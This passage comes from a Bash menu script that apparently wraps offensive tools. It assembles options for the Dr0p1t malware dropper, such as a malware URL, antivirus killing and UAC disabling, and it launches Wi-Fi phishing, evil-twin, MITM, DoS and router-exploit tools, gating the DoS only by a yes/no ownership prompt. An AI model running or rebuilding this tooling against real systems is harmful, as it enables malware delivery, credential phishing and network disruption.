2758 if [[ "$ISZIP" = "OFF" ]]
2759 then
2760 DISZIP=""
2761 else
2762 DISZIP="--zip"
2763 fi
2764 if [[ "$COMPRESS" = "OFF" ]]
2765 then
2766 DCOMPRESS=""
2767 else
2768 DCOMPRESS="--upx"
2769 fi
2770 if [[ "$DISUAC" = "OFF" ]]
2771 then
2772 DDISUAC=""
2773 else
2774 DDISIAC="--nouac"
2775 fi
2776 if [[ "$ICON" = "OFF" ]]
2777 then
2778 DICON=""
2779 else
2780 DICON="-i $ICON"
2781 fi
2782 if [[ "$EVENT" = "OFF" ]]
2783 then
2784 DEVENT=""
2785 else
2786 DEVENT="--noclearevent"
2787 fi
2788 if [[ "$COMPILE" = "OFF" ]]
2789 then
2790 DCOMPILE=""
2791 else
2792 DCOMPILE="--nocompile"
2793 fi
2794 if [[ "$D32" = "OFF" ]]
2795 then
2796 DD32=""
2797 else
2798 DD32="--only32"
2799 fi
2800 if [[ "$D64" = "OFF" ]]
2801 then
2802 DD64=""
2803 else
2804 DD64="--only64"
2805 fi
2806 if [[ "$BANN" = "OFF" ]]
2807 then
2808 DBANN=""
2809 else
2810 DBANN="-q"
2811 fi
2812 cd /root/Dr0p1t-Framework
2813 python Dr0p1t.py $MALURL $DSTARTUP $DTASK $DLTPUP $DKILLANT $DRUNBAT $DRUNPOW $DRUNVBS $DUACASADMIN $DSPOOFEXT $DISZIP $DCOMPRESS $DDISUAC $DICON $DEVENT $DCOMPILE $DD32 $DD64 $DBANN
2814 echo -e "$PAKTGB"
2815 $READAK
2816 cd
2817 elif [[ "$DR" = 1 ]]
2818 then
2819 echo -e "Malware URL: "
2820 read MALURL
2821 elif [[ "$DR" = 14 ]]
2822 then
2823 if [[ "$ICON" = "OFF" ]]
2824 then
2825 while true
2826 do
2827 echo -e ""$RS"Icon must be on /root/Dr0p1t-Framework/icons folder."$CE""
2828 echo -e ""
2829 ls -1 /root/Dr0p1t-Framework/icons/
2830 echo -e ""
2831 echo -e ""$YS"cp"$CE") Copy my icon to that folder"
2832 echo -e ""$YS" b"$CE") Go back"
2833 echo -e "Enter the name of your icon: "
2834 read ICON
2835 if [[ "$ICON" = "b" ]]
2836 then
2837 ICON="OFF"
2838 break
2839 elif [[ "$ICON" = "m" ]]
2840 then
2841 clear
2842 echo -e "Your file path: "
2843 read FP
2844 if [[ ! -f "$FP" ]]
2845 then
2846 echo -e ""$RS"File does not exist."$CE""
2847 sleep 2
2848 else
2849 cp "$FP" /root/Dr0p1t-Framework/icons/
2850 fi
2851 elif [[ ! -f /root/Dr0p1t-Framework/icons/"$ICON" ]]
2852 then
2853 if [[ ! -f /root/Dr0p1t-Framework/icons/"$ICON".ico ]]
2854 then
2855 echo -e ""$RS"File not found."$CE""
2856 sleep 2
2857 else
2858 ICON=""$ICON".ico"
2859 break
2860 fi
2861 else
2862 break
2863 fi
2864 done
2865 else
2866 ICON="OFF"
2867 fi
2868 elif [[ "$DR" = 8 ]]
2869 then
2870 if [[ "$RUNVBS" = "OFF" ]]
2871 then
2872 while true
2873 do
2874 echo -e ""$RS"Script must be on /root/Dr0p1t-Framework/scripts/vbs folder."$CE""
2875 echo -e ""
2876 ls -1 /root/Dr0p1t-Framework/scripts/vbs/
2877 echo -e ""
2878 echo -e ""$YS"cp"$CE") Copy my script to that folder"
2879 echo -e ""$YS" b"$CE") Go back"
2880 echo -e "Enter the name of your script: "
2881 read RUNVBS
2882 if [[ "$RUNVBS" = "b" ]]
2883 then
2884 RUNVBS="OFF"
2885 break
2886 elif [[ "$RUNVBS" = "m" ]]
2887 then
2888 clear
2889 echo -e "Your file path: "
2890 read FP
2891 if [[ ! -f "$FP" ]]
2892 then
2893 echo -e ""$RS"File does not exist."$CE""
2894 sleep 2
2895 else
2896 cp "$FP" /root/Dr0p1t-Framework/scripts/vbs/
2897 fi
2898 elif [[ ! -f /root/Dr0p1t-Framework/scripts/vbs/"$RUNVBS" ]]
2899 then
2900 if [[ ! -f /root/Dr0p1t-Framework/scripts/vbs/"$RUNVBS".vbs ]]
2901 then
2902 echo -e ""$RS"File not found."$CE""
2903 sleep 2
2904 else
2905 RUNVBS=""$RUNVBS".vbs"
2906 break
2907 fi
2908 else
2909 break
2910 fi
2911 done
2912 else
2913 RUNVBS="OFF"
2914 fi
2915 elif [[ "$DR" = 7 ]]
2916 then
2917 if [[ "$RUNPOW" = "OFF" ]]
2918 then
2919 while true
2920 do
2921 echo -e ""$RS"Script must be on /root/Dr0p1t-Framework/scripts/powershell folder."$CE""
2922 echo -e ""
2923 ls -1 /root/Dr0p1t-Framework/scripts/powershell/
2924 echo -e ""
2925 echo -e ""$YS"cp"$CE") Copy my script to that folder"
2926 echo -e ""$YS" b"$CE") Go back"
2927 echo -e "Enter the name of your script: "
2928 read RUNPOW
2929 if [[ "$RUNPOW" = "b" ]]
2930 then
2931 RUNPOW="OFF"
2932 break
2933 elif [[ "$RUNPOW" = "m" ]]
2934 then
2935 clear
2936 echo -e "Your file path: "
2937 read FP
2938 if [[ ! -f "$FP" ]]
2939 then
2940 echo -e ""$RS"File does not exist."$CE""
2941 sleep 2
2942 else
2943 cp "$FP" /root/Dr0p1t-Framework/scripts/powershell/
2944 fi
2945 elif [[ ! -f /root/Dr0p1t-Framework/scripts/powershell/"$RUNPOW" ]]
2946 then
2947 if [[ ! -f /root/Dr0p1t-Framework/scripts/powershell/"$RUNPOW".ps1 ]]
2948 then
2949 echo -e ""$RS"File not found."$CE""
2950 sleep 2
2951 else
2952 RUNPOW=""$RUNPOW".ps1"
2953 break
2954 fi
2955 else
2956 break
2957 fi
2958 done
2959 else
2960 RUNPOW="OFF"
2961 fi
2962 elif [[ "$DR" = 6 ]]
2963 then
2964 if [[ "$RUNBAT" = "OFF" ]]
2965 then
2966 while true
2967 do
2968 echo -e ""$RS"Script must be on /root/Dr0p1t-Framework/scripts/bat folder."$CE""
2969 echo -e ""
2970 ls -1 /root/Dr0p1t-Framework/scripts/bat/
2971 echo -e ""
2972 echo -e ""$YS"cp"$CE") Copy my script to that folder"
2973 echo -e ""$YS" b"$CE") Go back"
2974 echo -e "Enter the name of your script: "
2975 read RUNBAT
2976 if [[ "$RUNBAT" = "b" ]]
2977 then
2978 RUNBAT="OFF"
2979 break
2980 elif [[ "$RUNBAT" = "m" ]]
2981 then
2982 clear
2983 echo -e "Your file path: "
2984 read FP
2985 if [[ ! -f "$FP" ]]
2986 then
2987 echo -e ""$RS"File does not exist."$CE""
2988 sleep 2
2989 else
2990 cp "$FP" /root/Dr0p1t-Framework/scripts/bat/
2991 fi
2992 elif [[ ! -f /root/Dr0p1t-Framework/scripts/bat/"$RUNBAT" ]]
2993 then
2994 if [[ ! -f /root/Dr0p1t-Framework/scripts/bat/"$RUNBAT".bat ]]
2995 then
2996 echo -e ""$RS"File not found."$CE""
2997 sleep 2
2998 else
2999 RUNBAT=""$RUNBAT".bat"
3000 break
3001 fi
3002 else
3003 break
3004 fi
3005 done
3006 else
3007 RUNBAT="OFF"
3008 fi
3009 elif [[ "$DR" = 2 ]]
3010 then
3011 if [[ "$STARTUP" = "OFF" ]]
3012 then
3013 STARTUP="ON"
3014 else
3015 STARTUP="OFF"
3016 fi
3017 elif [[ "$DR" = 3 ]]
3018 then
3019 if [[ "$TASK" = "OFF" ]]
3020 then
3021 TASK="ON"
3022 else
3023 TASK="OFF"
3024 fi
3025 elif [[ "$DR" = 4 ]]
3026 then
3027 if [[ "$LTPUP" = "OFF" ]]
3028 then
3029 LTPUP="ON"
3030 else
3031 LTPUP="OFF"
3032 fi
3033 elif [[ "$DR" = 5 ]]
3034 then
3035 if [[ "$KILLANT" = "OFF" ]]
3036 then
3037 KILLANT="ON"
3038 else
3039 KILLANT="OFF"
3040 fi
3041 elif [[ "$DR" = 9 ]]
3042 then
3043 if [[ "$UACASADMIN" = "OFF" ]]
3044 then
3045 UACASADMIN="ON"
3046 else
3047 UACASADMIN="OFF"
3048 fi
3049 elif [[ "$DR" = 10 ]]
3050 then
3051 if [[ "$SPOOFEXT" = "OFF" ]]
3052 then
3053 echo -e "Extension: "
3054 read SPOOFEXT
3055 else
3056 SPOOFEXT="OFF"
3057 fi
3058 elif [[ "$DR" = 11 ]]
3059 then
3060 if [[ "$ISZIP" = "OFF" ]]
3061 then
3062 ISZIP="ON"
3063 else
3064 ISZIP="OFF"
3065 fi
3066 elif [[ "$DR" = 12 ]]
3067 then
3068 if [[ "$COMPRESS" = "OFF" ]]
3069 then
3070 COMPRESS="ON"
3071 else
3072 COMPRESS="OFF"
3073 fi
3074 elif [[ "$DR" = 13 ]]
3075 then
3076 if [[ "$DISUAC" = "OFF" ]]
3077 then
3078 DISUAC="ON"
3079 else
3080 DISUAC="OFF"
3081 fi
3082 elif [[ "$DR" = 15 ]]
3083 then
3084 if [[ "$EVENT" = "OFF" ]]
3085 then
3086 EVENT="ON"
3087 else
3088 EVENT="OFF"
3089 fi
3090 elif [[ "$DR" = 16 ]]
3091 then
3092 if [[ "$COMPILE" = "OFF" ]]
3093 then
3094 COMPILE="ON"
3095 else
3096 COMPILE="OFF"
3097 fi
3098 elif [[ "$DR" = 17 ]]
3099 then
3100 if [[ "$D32" = "OFF" ]]
3101 then
3102 D32="ON"
3103 else
3104 D32="OFF"
3105 fi
3106 elif [[ "$DR" = 18 ]]
3107 then
3108 if [[ "$D64" = "OFF" ]]
3109 then
3110 D64="ON"
3111 else
3112 D64="OFF"
3113 fi
3114 elif [[ "$DR" = 19 ]]
3115 then
3116 if [[ "$BANN" = "OFF" ]]
3117 then
3118 BANN="ON"
3119 else
3120 BANN="OFF"
3121 fi
3122 fi
3123done
3124}
3125function wifi_tools
3126{
3127 while true
3128 do
3129 printf '\033]2;WIFI TOOLS\a'
3130 clear
3131 TERMINALTITLE="WIFI TOOLS"
3132 dash_calc
3133 if [[ -d /root/fluxion ]]
3134 then
3135 echo -e ""$YS" 1"$CE") Fluxion The future of MITM WPA attacks"
3136 else
3137 echo -e ""$RS" 1"$CE") "$RS"Fluxion"$CE" The future of MITM WPA attacks"
3138 fi
3139 if [[ $(which wifite) ]]
3140 then
3141 echo -e ""$YS" 2"$CE") Wifite Automated wireless attack tool"
3142 else
3143 echo -e ""$RS" 2"$CE") "$RS"Wifite"$CE" Automated wireless attack tool"
3144 fi
3145 if [[ -d /root/wifiphisher ]]
3146 then
3147 echo -e ""$YS" 3"$CE") Wifiphisher Automated phishing attacks against Wi-Fi clients"
3148 else
3149 echo -e ""$RS" 3"$CE") "$RS"Wifiphisher"$CE" Automated phishing attacks against Wi-Fi clients"
3150 fi
3151 if [[ -d /root/Zatacker ]]
3152 then
3153 echo -e ""$YS" 4"$CE") Zatacker MITM-NMAP-Mail Spammer..(Install it manually)"
3154 else
3155 echo -e ""$RS" 4"$CE") "$RS"Zatacker"$CE" MITM-NMAP-Mail Spammer..(Install it manually)"
3156 fi
3157 if [[ -d /root/morpheus ]]
3158 then
3159 echo -e ""$YS" 5"$CE") Morpheus Automated Ettercap TCP/IP Hijacking Tool"
3160 else
3161 echo -e ""$RS" 5"$CE") "$RS"Morpheus"$CE" Automated Ettercap TCP/IP Hijacking Tool"
3162 fi
3163 #~ if [[ -d /root/osrframework ]]
3164 #~ then
3165 #~ echo -e ""$YS" 6"$CE") Osrfconsole Checks usernames-phones to platforms etc.."
3166 #~ else
3167 #~ echo -e ""$RS" 6"$CE") "$RS"Osrfconsole"$CE" Checks usernames-phones to platforms etc.."
3168 #~ fi
3169 if [[ -d /root/opensource ]]
3170 then
3171 echo -e ""$YS" 6"$CE") Netool-toolkit MitM pentesting opensource toolkit"
3172 else
3173 echo -e ""$RS" 6"$CE") "$RS"Netool-toolkit"$CE" MitM pentesting opensource toolkit"
3174 fi
3175 if [[ -d /root/hakkuframework ]]
3176 then
3177 echo -e ""$YS" 7"$CE") Hakku Penetration testing tools"
3178 else
3179 echo -e ""$RS" 7"$CE") "$RS"Hakku"$CE" Penetration testing tools"
3180 fi
3181 if [[ -d /root/Trity ]]
3182 then
3183 echo -e ""$YS" 8"$CE") Trity Advanced pentesting framework"
3184 else
3185 echo -e ""$RS" 8"$CE") "$RS"Trity"$CE" Advanced pentesting framework"
3186 fi
3187 if [[ -d /root/Dracnmap ]]
3188 then
3189 echo -e ""$YS" 9"$CE") Dracnmap Many scan options"
3190 else
3191 echo -e ""$RS" 9"$CE") "$RS"Dracnmap"$CE" Many scan options"
3192 fi
3193 if [[ -d "/usr/share/fern-wifi-cracker" ]]
3194 then
3195 echo -e ""$YS"10"$CE") Fern Wifi cracker GUI"
3196 else
3197 echo -e ""$RS"10"$CE") "$RS"Fern"$CE" Wifi cracker GUI"
3198 fi
3199 if [[ -f /usr/sbin/netdiscover ]]
3200 then
3201 echo -e ""$YS"11"$CE") Netdiscover Network address discovering tool"
3202 else
3203 echo -e ""$RS"11"$CE") "$RS"Netdiscover"$CE" Network address discovering tool"
3204 fi
3205 if [[ -d /root/kickthemout ]]
3206 then
3207 echo -e ""$YS"12"$CE") KickThemOut Kick devices off your network"
3208 else
3209 echo -e ""$RS"12"$CE") "$RS"KickThemOut"$CE" Kick devices off your network"
3210 fi
3211 if [[ -d "/usr/share/ghost-phisher" ]]
3212 then
3213 echo -e ""$YS"13"$CE") Ghost-Phisher Fake AP,MITM,Session hijacking etc..."
3214 else
3215 echo -e ""$RS"13"$CE") "$RS"Ghost-Phisher"$CE" Fake AP,MITM,Session hijacking etc..."
3216 fi
3217 if [[ -d /root/The-Eye ]]
3218 then
3219 echo -e ""$YS"14"$CE") The Eye Detects ARP poisoning DNS spoofing etc..."
3220 else
3221 echo -e ""$RS"14"$CE") "$RS"The Eye"$CE" Detects ARP poisoning DNS spoofing etc..."
3222 fi
3223 if [[ -d /root/xerxes ]]
3224 then
3225 echo -e ""$YS"15"$CE") Xerxes The most powerful DoS tool(CAUTION)"
3226 else
3227 echo -e ""$RS"15"$CE") "$RS"Xerxes"$CE" The most powerful DoS tool(CAUTION)"
3228 fi
3229 if [[ -d /root/KatanaFramework ]]
3230 then
3231 echo -e ""$YS"16"$CE") Katana Framework Many penetration testing features"
3232 else
3233 echo -e ""$RS"16"$CE") "$RS"Katana Framework"$CE" Many penetration testing features"
3234 fi
3235 if [[ -d /root/airgeddon ]]
3236 then
3237 echo -e ""$YS"17"$CE") Airgeddon Audit wireless networks."
3238 else
3239 echo -e ""$RS"17"$CE") "$RS"Airgeddon"$CE" Audit wireless networks."
3240 fi
3241 if [[ -f /usr/bin/websploit ]]
3242 then
3243 echo -e ""$YS"18"$CE") Websploit Advanced MITM framework"
3244 else
3245 echo -e ""$RS"18"$CE") "$RS"Websploit"$CE" Advanced MITM framework"
3246 fi
3247 if [[ -d /etc/openvas ]]
3248 then
3249 echo -e ""$YS"19"$CE") Openvas Vulnerability scanner LAN"
3250 else
3251 echo -e ""$RS"19"$CE") "$RS"Openvas"$CE" Vulnerability scanner LAN"
3252 fi
3253 if [[ -f /usr/bin/ipscan ]]
3254 then
3255 echo -e ""$YS"20"$CE") Angry IP Scanner IP Scanner"
3256 else
3257 echo -e ""$RS"20"$CE") "$RS"Angry IP Scanner"$CE" IP Scanner"
3258 fi
3259 if [[ -d /root/routersploit ]]
3260 then
3261 echo -e ""$YS"21"$CE") Routersploit Find/exploit router vulnerabilities"
3262 else
3263 echo -e ""$RS"21"$CE") "$RS"Routersploit"$CE" Find/exploit router vulnerabilities"
3264 fi
3265 if [[ -d /root/nWatch ]]
3266 then
3267 echo -e ""$YS"22"$CE") nWatch IP scanner/OS detection"
3268 else
3269 echo -e ""$RS"22"$CE") "$RS"nWatch"$CE" IP scanner/OS detection"
3270 fi
3271 if [[ -d /root/eternal_scanner ]]
3272 then
3273 echo -e ""$YS"23"$CE") Eternal scanner Scans hosts for eternalblue vulnerabilities"
3274 else
3275 echo -e ""$RS"23"$CE") "$RS"Eternal scanner"$CE" Scans hosts for eternalblue vulnerabilities"
3276 fi
3277 if [[ -d /root/eaphammer ]]
3278 then
3279 echo -e ""$YS"24"$CE") Eaphammer Evil twin attacks against WPA2-Enterprise networks"
3280 else
3281 echo -e ""$RS"24"$CE") "$RS"Eaphammer"$CE" Evil twin attacks against WPA2-Enterprise networks"
3282 fi
3283 if [[ -d /root/VMR ]]
3284 then
3285 echo -e ""$YS"25"$CE") VMR Best WPS cracker, mdk3-v6"
3286 else
3287 echo -e ""$RS"25"$CE") "$RS"VMR"$CE" Best WPS cracker, mdk3-v6"
3288 fi
3289 if [[ -d /root/netattack2 ]]
3290 then
3291 echo -e ""$YS"26"$CE") Netattack3 Advanced network scan and attack script"
3292 else
3293 echo -e ""$RS"26"$CE") "$RS"Netattack2"$CE" Advanced network scan and attack script"
3294 fi
3295 if [[ -f /usr/bin/wifi-pumpkin ]]
3296 then
3297 echo -e ""$YS"27"$CE") Wifi-Pumpkin Framework for Rogue Wi-Fi Access Point Attack"
3298 else
3299 echo -e ""$RS"27"$CE") "$RS"Wifi-Pumpkin"$CE" Framework for Rogue Wi-Fi Access Point Attack"
3300 fi
3301 if [[ -d /root/Gloom-Framework ]]
3302 then
3303 echo -e ""$YS"28"$CE") Gloom Penetration Testing Framework"
3304 else
3305 echo -e ""$RS"28"$CE") "$RS"Gloom"$CE" Penetration Testing Framework"
3306 fi
3307 if [[ -f /usr/bin/sechub ]]
3308 then
3309 echo -e ""$YS"29"$CE") secHub Security/Hacking Kit"
3310 else
3311 echo -e ""$RS"29"$CE") "$RS"secHub"$CE" Security/Hacking Kit"
3312 fi
3313 if [[ -d /root/SocialFish ]]
3314 then
3315 echo -e ""$YS"30"$CE") SocialFish Ultimate phishing tool with Ngrok integrated"
3316 else
3317 echo -e ""$RS"30"$CE") "$RS"SocialFish"$CE" Ultimate phishing tool with Ngrok integrated"
3318 fi
3319 echo -e ""$YS" b"$CE") Go back"
3320 echo -e ""$YS"00"$CE") Main menu"
3321 #echo -e ""$YS" 0"$CE") EXIT"
3322 echo -e "Choose: "
3323 read -e APPP
3324 clear
3325 if [[ "$APPP" = "1" ]]
3326 then
3327 if [[ -d /root/fluxion ]]
3328 then
3329 cd /root/fluxion
3330 #~ if [[ -f /root/fluxion/fluxion ]]
3331 #~ then
3332 ./fluxion*
3333 #~ elif [[ -f /root/fluxion/fluxion.sh ]]
3334 #~ then
3335 #~ ./fluxion.sh
3336 #~ fi
3337 cd
3338 else
3339 echo -e "$TNI"
3340 read INSTALL
3341 if [[ "$INSTALL" = "install" ]]
3342 then
3343 install_fluxion
3344 else
3345 continue
3346 fi
3347 fi
3348 elif [[ "$APPP" = "2" ]]
3349 then
3350 if [[ $(which wifite) ]]
3351 then
3352 wifite
3353 else
3354 echo -e "$TNI"
3355 read INSTALL
3356 if [[ "$INSTALL" = "install" ]]
3357 then
3358 install_wifite
3359 else
3360 continue
3361 fi
3362 fi
3363 elif [[ "$APPP" = "3" ]]
3364 then
3365 if [[ -d /root/wifiphisher ]]
3366 then
3367 clear
3368 wifiphisher
3369 else
3370 echo -e "$TNI"
3371 read INSTALL
3372 if [[ "$INSTALL" = "install" ]]
3373 then
3374 install_wifiphisher
3375 else
3376 continue
3377 fi
3378 fi
3379 elif [[ "$APPP" = "4" ]]
3380 then
3381 if [[ -d /root/Zatacker ]]
3382 then
3383 if [[ -d "/root/Zatacker" ]]
3384 then
3385 cd /root/Zatacker
3386 ./ZT.sh
3387 cd
3388 else
3389 echo -e "You have to install it manually since its not on github.Sorry."
3390 sleep 4
3391 exec bash "$0"
3392 fi
3393 else
3394 echo -e "$TNI"
3395 read INSTALL
3396 if [[ "$INSTALL" = "install" ]]
3397 then
3398 install_zatacker
3399 else
3400 continue
3401 fi
3402 fi
3403 elif [[ "$APPP" = "5" ]]
3404 then
3405 if [[ -d /root/morpheus ]]
3406 then
3407 cd /root/morpheus
3408 ./morpheus.sh
3409 cd
3410 else
3411 echo -e "$TNI"
3412 read INSTALL
3413 if [[ "$INSTALL" = "install" ]]
3414 then
3415 install_morpheus
3416 else
3417 continue
3418 fi
3419 fi
3420 elif [[ "$APPP" = "6" ]]
3421 then
3422 if [[ -d "/root/opensource" ]]
3423 then
3424 cd /root/opensource
3425 ./netool.sh
3426 else
3427 echo -e "$TNI"
3428 read INSTALL
3429 if [[ "$INSTALL" = "install" ]]
3430 then
3431 install_netool
3432 else
3433 continue
3434 fi
3435 fi
3436 elif [[ "$APPP" = "7" ]]
3437 then
3438 if [[ -d /root/hakkuframework ]]
3439 then
3440 echo -e "type: 'show modules' to start"
3441 sleep 2
3442 clear
3443 cd /root/hakkuframework
3444 ./hakku
3445 cd
3446 else
3447 echo -e "$TNI"
3448 read INSTALL
3449 if [[ "$INSTALL" = "install" ]]
3450 then
3451 install_hakku
3452 else
3453 continue
3454 fi
3455 fi
3456 elif [[ "$APPP" = "8" ]]
3457 then
3458 if [[ -d /root/Trity ]]
3459 then
3460 echo -e "type: 'help' to start"
3461 sleep 2
3462 clear
3463 trity
3464 else
3465 echo -e "$TNI"
3466 read INSTALL
3467 if [[ "$INSTALL" = "install" ]]
3468 then
3469 install_trity
3470 else
3471 continue
3472 fi
3473 fi
3474 elif [[ "$APPP" = "9" ]]
3475 then
3476 if [[ -d "/root/Dracnmap" ]]
3477 then
3478 cd /root/Dracnmap/
3479 ./dracnmap-v*.sh
3480 cd
3481 else
3482 echo -e "$TNI"
3483 read INSTALL
3484 if [[ "$INSTALL" = "install" ]]
3485 then
3486 install_dracnmap
3487 else
3488 continue
3489 fi
3490 fi
3491 elif [[ "$APPP" = "10" ]]
3492 then
3493 if [[ -d "/usr/share/fern-wifi-cracker" ]]
3494 then
3495 cd /root/Fern-Wifi-Cracker
3496 python execute.py
3497 cd
3498 else
3499 echo -e "$TNI"
3500 read INSTALL
3501 if [[ "$INSTALL" = "install" ]]
3502 then
3503 install_fern
3504 else
3505 continue
3506 fi
3507 fi
3508 elif [[ "$APPP" = "11" ]]
3509 then
3510 if [[ -f /usr/sbin/netdiscover ]]
3511 then
3512 echo -e "Range ("$YS"Enter"$CE"=192.168.1.0/24):"
3513 read NRANGE
3514 if [[ -z $NRANGE ]]
3515 then
3516 NRANGE="192.168.1.0/24"
3517 fi
3518 netdiscover -r $NRANGE -i "$WLANN"
3519 else
3520 echo -e "$TNI"
3521 read INSTALL
3522 if [[ "$INSTALL" = "install" ]]
3523 then
3524 install_netdiscover
3525 else
3526 continue
3527 fi
3528 fi
3529 elif [[ "$APPP" = "12" ]]
3530 then
3531 if [[ -d "/root/kickthemout" ]]
3532 then
3533 cd /root/kickthemout
3534 python kickthemout.py
3535 cd
3536 else
3537 echo -e "$TNI"
3538 read INSTALL
3539 if [[ "$INSTALL" = "install" ]]
3540 then
3541 install_kickthemout
3542 else
3543 continue
3544 fi
3545 fi
3546 elif [[ "$APPP" = "13" ]]
3547 then
3548 if [[ -d "/usr/share/ghost-phisher" ]]
3549 then
3550 cd /root/ghost-phisher/Ghost-Phisher
3551 python ghost.py
3552 cd
3553 else
3554 echo -e "$TNI"
3555 read INSTALL
3556 if [[ "$INSTALL" = "install" ]]
3557 then
3558 install_ghostphisher
3559 else
3560 continue
3561 fi
3562 fi
3563 elif [[ "$APPP" = "14" ]]
3564 then
3565 if [[ -d "/root/The-Eye" ]]
3566 then
3567 cd /root/The-Eye
3568 ./TheEye
3569 cd
3570 else
3571 echo -e "$TNI"
3572 read INSTALL
3573 if [[ "$INSTALL" = "install" ]]
3574 then
3575 install_theeye
3576 else
3577 continue
3578 fi
3579 fi
3580 elif [[ "$APPP" = "15" ]]
3581 then
3582 if [[ -d "/root/xerxes" ]]
3583 then
3584 echo -e "Do you own the site you want to DoS?"$YNONLY""
3585 read DOSTERM
3586 if [[ "$DOSTERM" = "y" ]]
3587 then
3588
3589 clear
3590 echo -e "Enter your site(e.g: iownthissite.com): "
3591 echo -e "(without www)"
3592 read -e SITEDOS
3593 clear
3594 echo -e "Launching www.isitdownrightnow.com for $SITEDOS"
3595 sleep 4
3596 gio open http://www.isitdownrightnow.com/"$SITEDOS".html
3597 clear
3598 cd /root/xerxes
3599 SITEDOSX=www.$SITEDOS
3600 echo -e "Press "$YS"any key"$CE" to start DoS on $SITEDOSX"
3601 $READAK
3602 ./xerxes $SITEDOSX 80
3603 else
3604 clear
3605 echo -e "Then never try this."
3606 sleep 3
3607 exec bash "$0"
3608 fi
3609 else
3610 echo -e "$TNI"
3611 read INSTALL
3612 if [[ "$INSTALL" = "install" ]]
3613 then
3614 install_xerxes
3615 else
3616 continue
3617 fi
3618 fi
3619 elif [[ "$APPP" = "16" ]]
3620 then
3621 if [[ -d "/usr/share/KatanaFramework" ]]
3622 then
3623 ktf.console
3624 else
3625 echo -e "$TNI"
3626 read INSTALL
3627 if [[ "$INSTALL" = "install" ]]
3628 then
3629 install_katana
3630 else
3631 continue
3632 fi
3633 fi
3634 elif [[ "$APPP" = "17" ]]
3635 then
3636 if [[ -d "/root/airgeddon" ]]
3637 then
3638 cd /root/airgeddon
3639 ./airgeddon.sh
3640 cd
3641 else
3642 echo -e "$TNI"
3643 read INSTALL
3644 if [[ "$INSTALL" = "install" ]]
3645 then
3646 install_airgeddon
3647 else
3648 continue
3649 fi
3650 fi
3651 elif [[ "$APPP" = "18" ]]
3652 then
3653 if [[ -d "/usr/share/websploit" ]]
3654 then
3655 websploit
3656 else
3657 echo -e "$TNI"
3658 read INSTALL
3659 if [[ "$INSTALL" = "install" ]]
3660 then
3661 install_websploit
3662 else
3663 continue
3664 fi
3665 fi
3666 elif [[ "$APPP" = "19" ]]
3667 then
3668 if [[ -d /etc/openvas ]]
3669 then
3670 echo -e "Start or stop?("$YS"start"$CE"/"$YS"stop"$CE")"
3671 read -e SORS
3672 if [[ "$SORS" == "start" ]]
3673 then
3674 netstat -nltp
3675 openvas-start
3676 echo -e "Launching firefox..."
3677 sleep 1
3678 firefox https://127.0.0.1:9392
3679 else
3680 openvas-stop
3681 fi
3682 else
3683 echo -e "$TNI"
3684 read INSTALL
3685 if [[ "$INSTALL" = "install" ]]
3686 then
3687 install_openvas
3688 else
3689 continue
3690 fi
3691 fi
3692 elif [[ "$APPP" = "20" ]]
3693 then
3694 if [[ -d "/usr/lib/ipscan" ]]
3695 then
3696 bash /usr/bin/ipscan & disown
3697 else
3698 echo -e "$TNI"
3699 read INSTALL
3700 if [[ "$INSTALL" = "install" ]]
3701 then
3702 install_angryip
3703 else
3704 continue
3705 fi
3706 fi
3707 elif [[ "$APPP" = "21" ]]
3708 then
3709 if [[ -d "/root/routersploit" ]]
3710 then
3711 cd /root/routersploit
3712 ./rsf.py
3713 cd
3714 else
3715 echo -e "$TNI"
3716 read INSTALL
3717 if [[ "$INSTALL" = "install" ]]
3718 then
3719 install_routersploit
3720 else
3721 continue
3722 fi
3723 fi
3724 elif [[ "$APPP" = "22" ]]
3725 then
3726 if [[ -d "/root/nWatch" ]]
3727 then
3728 cd /root/nWatch
3729 python nwatch.py
3730 cd
3731 else
3732 echo -e "$TNI"
3733 read INSTALL
3734 if [[ "$INSTALL" = "install" ]]
3735 then
3736 install_nwatch
3737 else
3738 continue
3739 fi
3740 fi
3741 elif [[ "$APPP" = "23" ]]
3742 then
3743 if [[ -d "/root/eternal_scanner" ]]
3744 then
3745 cd /root/eternal_scanner
3746 ./escan
3747 cd
3748 else
3749 echo -e "$TNI"
3750 read INSTALL
3751 if [[ "$INSTALL" = "install" ]]
3752 then
3753 install_eternalscanner
3754 else
3755 continue
3756 fi
3757 fi
3758 elif [[ "$APPP" = "24" ]]
3759 then
3760 if [[ -d "/root/eaphammer" ]]
3761 then
3762 eaphammer_automation
3763 else
3764 echo -e "$TNI"
3765 read INSTALL
3766 if [[ "$INSTALL" = "install" ]]
3767 then
3768 install_eaphammer
3769 else
3770 continue
3771 fi
3772 fi
3773 cd
3774 elif [[ "$APPP" = "25" ]]
3775 then
3776 if [[ -d "/root/VMR" ]]
3777 then
3778 cd /root/VMR
3779 ./VMR-MDK-K2-2017R-012x2.sh
3780 else
3781 echo -e "$TNI"
3782 read INSTALL
3783 if [[ "$INSTALL" = "install" ]]
3784 then
3785 install_vmr
3786 else
3787 continue
3788 fi
3789 fi
3790 cd
3791 elif [[ "$APPP" = "26" ]]
3792 then
3793 if [[ -d "/root/netattack2" ]]
3794 then
3795 cd /root/netattack2
3796 python2 netattack2.py
3797 else
3798 echo -e "$TNI"
3799 read INSTALL
3800 if [[ "$INSTALL" = "install" ]]
3801 then
3802 install_netattack2
3803 else
3804 continue
3805 fi
3806 fi
3807 cd
3808 elif [[ "$APPP" = "27" ]]
3809 then
3810 if [[ -f "/usr/bin/wifi-pumpkin" ]]
3811 then
3812 wifi-pumpkin
3813 else
3814 echo -e "$TNI"
3815 read INSTALL
3816 if [[ "$INSTALL" = "install" ]]
3817 then
3818 install_wifi_pumpkin
3819 else
3820 continue
3821 fi
3822 fi
3823 cd
3824 elif [[ "$APPP" = "28" ]]
3825 then
3826 if [[ -d "/root/Gloom-Framework" ]]
3827 then
3828 cd /root/Gloom-Framework
3829 python gloom.py
3830 else
3831 echo -e "$TNI"
3832 read INSTALL
3833 if [[ "$INSTALL" = "install" ]]
3834 then
3835 install_gloom
3836 else
3837 continue
3838 fi
3839 fi
3840 cd
3841 elif [[ "$APPP" = "29" ]]
3842 then
3843 if [[ -f "/usr/bin/sechub" ]]
3844 then
3845 sechub
3846 else
3847 echo -e "$TNI"
3848 read INSTALL
3849 if [[ "$INSTALL" = "install" ]]
3850 then
3851 install_sechub
3852 else
3853 continue
3854 fi
3855 fi
3856 cd
3857 elif [[ "$APPP" = "30" ]]
3858 then
3859 if [[ -d "/root/SocialFish" ]]
3860 then
3861 cd /root/SocialFish
3862 python SocialFish.py
3863 else
3864 echo -e "$TNI"
3865 read INSTALL
3866 if [[ "$INSTALL" = "install" ]]
3867 then
